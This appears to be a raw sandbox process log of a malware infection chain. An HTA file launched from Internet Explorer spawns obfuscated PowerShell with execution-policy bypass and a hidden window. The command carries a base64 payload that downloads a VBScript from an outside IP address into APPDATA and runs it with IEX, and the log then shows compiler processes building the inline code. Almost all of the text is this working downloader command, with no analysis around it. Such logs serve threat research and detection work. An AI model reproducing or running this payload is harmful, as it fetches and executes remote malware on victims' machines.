iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta.html
2624PoWERsHeLl.EXe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
2944powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
2168csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ki9mslvh.cmdline"
1536cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES163E.tmp" "c:\Users\test22\AppData\Local\Temp\CSC15D0.tmp"
3008